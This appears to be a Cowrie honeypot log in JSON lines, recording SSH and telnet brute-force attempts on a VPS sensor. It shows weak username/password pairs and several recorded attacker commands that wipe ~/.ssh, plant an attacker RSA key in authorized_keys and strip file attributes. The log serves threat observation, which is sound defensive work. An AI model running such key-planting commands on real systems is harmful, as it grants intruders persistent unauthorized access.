{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:07:26.484526Z","src_ip":"216.107.136.92","session":"911dde86c9a8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:07:26.576996Z","src_ip":"216.107.136.92","session":"911dde86c9a8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:07:26.577835Z","src_ip":"216.107.136.92","session":"911dde86c9a8"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":38906,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5089616c5a6","protocol":"ssh","message":"New connection: 216.107.136.92:38906 (1.2.3.4:22) [session: f5089616c5a6]","sensor":"my-vps","timestamp":"2025-09-08T20:07:35.713053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:07:35.713992Z","src_ip":"216.107.136.92","session":"f5089616c5a6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:07:35.803997Z","src_ip":"216.107.136.92","session":"f5089616c5a6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:07:36.207326Z","src_ip":"216.107.136.92","session":"f5089616c5a6"}
{"eventid":"cowrie.session.closed","duration":"10.9","message":"Connection lost after 10.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:07:36.298608Z","src_ip":"216.107.136.92","session":"911dde86c9a8"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:07:36.299479Z","src_ip":"216.107.136.92","session":"f5089616c5a6"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":49214,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f05c03af547","protocol":"ssh","message":"New connection: 103.206.72.2:49214 (1.2.3.4:22) [session: 1f05c03af547]","sensor":"my-vps","timestamp":"2025-09-08T20:08:04.696127Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:08:04.701216Z","src_ip":"103.206.72.2","session":"1f05c03af547"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:08:04.873722Z","src_ip":"103.206.72.2","session":"1f05c03af547"}
{"eventid":"cowrie.login.failed","username":"gaoyuan","password":"gaoyuan2025","message":"login attempt [gaoyuan/gaoyuan2025] failed","sensor":"my-vps","timestamp":"2025-09-08T20:08:05.568076Z","src_ip":"103.206.72.2","session":"1f05c03af547"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:08:06.747856Z","src_ip":"103.206.72.2","session":"1f05c03af547"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":38564,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1c12355989e","protocol":"ssh","message":"New connection: 77.75.56.63:38564 (1.2.3.4:22) [session: f1c12355989e]","sensor":"my-vps","timestamp":"2025-09-08T20:08:24.667683Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:08:24.668728Z","src_ip":"77.75.56.63","session":"f1c12355989e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:08:24.704855Z","src_ip":"77.75.56.63","session":"f1c12355989e"}
{"eventid":"cowrie.login.failed","username":"hduser","password":"abc123","message":"login attempt [hduser/abc123] failed","sensor":"my-vps","timestamp":"2025-09-08T20:08:24.907336Z","src_ip":"77.75.56.63","session":"f1c12355989e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:08:25.951538Z","src_ip":"77.75.56.63","session":"f1c12355989e"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:08:37.635228Z","src_ip":"101.126.89.164","session":"c25e4fc16b61"}
{"eventid":"cowrie.session.connect","src_ip":"47.91.14.61","src_port":56754,"dst_ip":"1.2.3.4","dst_port":23,"session":"0169ac538eff","protocol":"telnet","message":"New connection: 47.91.14.61:56754 (1.2.3.4:23) [session: 0169ac538eff]","sensor":"my-vps","timestamp":"2025-09-08T20:08:47.208874Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":42588,"dst_ip":"1.2.3.4","dst_port":22,"session":"be35a208b7c3","protocol":"ssh","message":"New connection: 103.206.72.2:42588 (1.2.3.4:22) [session: be35a208b7c3]","sensor":"my-vps","timestamp":"2025-09-08T20:09:22.378618Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:09:22.381810Z","src_ip":"103.206.72.2","session":"be35a208b7c3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:09:22.552698Z","src_ip":"103.206.72.2","session":"be35a208b7c3"}
{"eventid":"cowrie.login.failed","username":"gbase","password":"password1","message":"login attempt [gbase/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T20:09:23.249305Z","src_ip":"103.206.72.2","session":"be35a208b7c3"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:09:24.426566Z","src_ip":"103.206.72.2","session":"be35a208b7c3"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":34542,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f6cd29f624d","protocol":"ssh","message":"New connection: 77.75.56.63:34542 (1.2.3.4:22) [session: 0f6cd29f624d]","sensor":"my-vps","timestamp":"2025-09-08T20:09:30.352861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:09:30.353772Z","src_ip":"77.75.56.63","session":"0f6cd29f624d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:09:30.391426Z","src_ip":"77.75.56.63","session":"0f6cd29f624d"}
{"eventid":"cowrie.login.failed","username":"info","password":"test","message":"login attempt [info/test] failed","sensor":"my-vps","timestamp":"2025-09-08T20:09:30.579171Z","src_ip":"77.75.56.63","session":"0f6cd29f624d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:09:31.648560Z","src_ip":"77.75.56.63","session":"0f6cd29f624d"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"1","message":"login attempt [dspace/1] failed","sensor":"my-vps","timestamp":"2025-09-08T20:09:48.066548Z","src_ip":"47.91.14.61","session":"0169ac538eff"}
{"eventid":"cowrie.session.closed","duration":60.85842299461365,"message":"Connection lost after 60 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:09:48.067209Z","src_ip":"47.91.14.61","session":"0169ac538eff"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":37986,"dst_ip":"1.2.3.4","dst_port":22,"session":"0841cbdf3ebe","protocol":"ssh","message":"New connection: 77.75.56.63:37986 (1.2.3.4:22) [session: 0841cbdf3ebe]","sensor":"my-vps","timestamp":"2025-09-08T20:10:39.091443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:10:39.094277Z","src_ip":"77.75.56.63","session":"0841cbdf3ebe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:10:39.409945Z","src_ip":"77.75.56.63","session":"0841cbdf3ebe"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55972,"dst_ip":"1.2.3.4","dst_port":22,"session":"3efb477ea180","protocol":"ssh","message":"New connection: 217.72.205.35:55972 (1.2.3.4:22) [session: 3efb477ea180]","sensor":"my-vps","timestamp":"2025-09-08T20:10:39.855567Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:10:39.856855Z","src_ip":"217.72.205.35","session":"3efb477ea180"}
{"eventid":"cowrie.login.success","username":"root","password":"password99","message":"login attempt [root/password99] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:10:40.678280Z","src_ip":"77.75.56.63","session":"0841cbdf3ebe"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":35962,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea043d56a2b5","protocol":"ssh","message":"New connection: 103.206.72.2:35962 (1.2.3.4:22) [session: ea043d56a2b5]","sensor":"my-vps","timestamp":"2025-09-08T20:10:41.034575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:10:41.040488Z","src_ip":"103.206.72.2","session":"ea043d56a2b5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:10:41.223735Z","src_ip":"103.206.72.2","session":"ea043d56a2b5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:10:41.314757Z","src_ip":"77.75.56.63","session":"0841cbdf3ebe"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:10:41.315434Z","src_ip":"77.75.56.63","session":"0841cbdf3ebe"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:10:41.316529Z","src_ip":"77.75.56.63","session":"0841cbdf3ebe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:10:41.628903Z","src_ip":"77.75.56.63","session":"0841cbdf3ebe"}
{"eventid":"cowrie.login.failed","username":"ansible","password":"qwerty","message":"login attempt [ansible/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-08T20:10:41.964317Z","src_ip":"103.206.72.2","session":"ea043d56a2b5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:10:42.339531Z","src_ip":"77.75.56.63","session":"0841cbdf3ebe"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:10:42.340280Z","src_ip":"77.75.56.63","session":"0841cbdf3ebe"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:10:42.639248Z","src_ip":"77.75.56.63","session":"0841cbdf3ebe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:10:42.640161Z","src_ip":"77.75.56.63","session":"0841cbdf3ebe"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":38000,"dst_ip":"1.2.3.4","dst_port":22,"session":"52f85f6fc4be","protocol":"ssh","message":"New connection: 77.75.56.63:38000 (1.2.3.4:22) [session: 52f85f6fc4be]","sensor":"my-vps","timestamp":"2025-09-08T20:10:42.806643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:10:42.811368Z","src_ip":"77.75.56.63","session":"52f85f6fc4be"}
